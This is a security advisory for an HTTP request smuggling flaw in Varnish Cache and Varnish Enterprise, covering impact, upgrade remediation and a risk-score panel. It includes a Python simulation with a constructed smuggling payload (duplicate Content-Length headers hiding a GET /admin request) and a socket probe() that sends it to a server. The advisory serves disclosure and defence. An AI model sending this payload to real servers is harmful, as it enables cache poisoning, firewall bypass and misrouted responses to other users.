Varnish Cache and Varnish Enterprise Client-Side Desynchronization Vulnerability Allowing HTTP Request Smuggling

Vulnerability

A client-side desynchronization vulnerability has been identified in Varnish Cache versions prior to 7.6.2 and Varnish Enterprise versions prior to 6.0.13r10. It allows HTTP request smuggling through the way certain malformed HTTP/1 requests are handled. When a request carries more than one 'Host' header or more than one 'Content-Length' header, Varnish answers with a '400 Bad Request' but, rather than closing the connection, keeps reading it and treats whatever follows the rejected header block as the next request. Because the rejected request's body was never consumed, the client and Varnish now disagree about where one request ends and the next begins, and responses can be delivered to the wrong request on that connection.
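To make the boundary problem concrete, the following is an added illustration written for this page, not Varnish source code. It models a minimal HTTP/1 request reader in two modes: the behaviour described above (reject with 400, keep reading the connection) and the safe behaviour (reject with 400, close the connection). The request bytes, the hostname example.test and the paths are all constructed for the example; the optional probe() helper is an assumption about how one would check a test instance of one's own and is not run by the test.

```python
"""Simulation of the duplicate-header desync described in the advisory (added example)."""
import socket

CRLF = b"\r\n"


def parse_head(data: bytes):
    """Split one request head off `data`.

    Returns (method, target, [(lower_name, value), ...], remaining_bytes),
    or None when no complete header block is present yet.
    """
    end = data.find(b"\r\n\r\n")
    if end == -1:
        return None
    head, rest = data[:end], data[end + 4:]
    lines = head.split(CRLF)
    method, target, _version = lines[0].split(b" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers, rest


def duplicated(headers, name: bytes) -> bool:
    """True when header `name` occurs more than once."""
    return sum(1 for n, _ in headers if n == name) > 1


def serve_connection(stream: bytes, close_on_400: bool):
    """Return the (status, method, target) tuples the server acts on for one connection.

    close_on_400=False models the pre-fix behaviour: the 400 is sent, but the
    bytes the client intended as the body are parsed as the next request.
    close_on_400=True models the fix: with an unknown request boundary the only
    safe action is to drop the connection after the 400.
    """
    log = []
    data = stream
    while data:
        parsed = parse_head(data)
        if parsed is None:
            break
        method, target, headers, rest = parsed
        if duplicated(headers, b"host") or duplicated(headers, b"content-length"):
            log.append((400, method, target))
            if close_on_400:
                break
            data = rest  # vulnerable: body bytes become the next request head
            continue
        # Well-formed request: consume its body by the single Content-Length.
        length = int(dict(headers).get(b"content-length", b"0"))
        data = rest[length:]
        log.append((200, method, target))
    return log


# Constructed attacker request: two Content-Length headers, and a body that is
# itself a second request. Hostname and paths are made up for the example.
SMUGGLED = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 20\r\n"
    b"Content-Length: 30\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"\r\n"
)

# Constructed request a browser would send next on the same keep-alive connection.
VICTIM = b"GET /profile HTTP/1.1\r\nHost: example.test\r\n\r\n"


def count_responses(raw: bytes) -> int:
    """Count HTTP/1.x status lines in a raw response stream."""
    return sum(1 for line in raw.split(CRLF) if line.startswith(b"HTTP/1."))


def probe(host: str, port: int = 80, timeout: float = 3.0) -> int:
    """Send SMUGGLED to a test instance you own and count the responses received.

    Assumption: an unfixed server answers the single malformed request with a
    400 followed by a response to the smuggled GET and leaves the connection
    open; a fixed server sends one 400 and closes.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(SMUGGLED)
        chunks = []
        try:
            while True:
                chunk = sock.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return count_responses(b"".join(chunks))


if __name__ == "__main__":
    print("vulnerable:", serve_connection(SMUGGLED + VICTIM, close_on_400=False))
    print("fixed:     ", serve_connection(SMUGGLED + VICTIM, close_on_400=True))
```

In the vulnerable mode the log shows three actions for what the client thinks were two requests, so the response to GET /admin is the one the browser pairs with its GET /profile; that is the response misrouting the advisory describes. In the fixed mode the connection ends at the 400 and the ambiguity never reaches a second request.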

Impact

Exploitation of this vulnerability enables HTTP request smuggling, and the consequences fall on the systems in front of Varnish as much as on Varnish itself. A cache placed in front of Varnish can be poisoned: because responses are paired with the wrong requests, the cache may store incorrect or attacker-chosen content under a legitimate URL and serve it to other users, possibly exposing sensitive information. A Web Application Firewall (WAF) that inspects only the request line and headers, not the request body, can also be bypassed, since the smuggled request travels inside the body of the malformed one and is never examined.

Remediation

Users are advised to upgrade to Varnish Cache 7.6.2 or 7.7.0, or to Varnish Enterprise 6.0.13r10. After upgrading, Varnish must be restarted for the fix to take effect.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 6.4
impact: 0.0
exploitability: 8.3
remediation: 7.7
relevance: 0.0
threat: 0.0
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.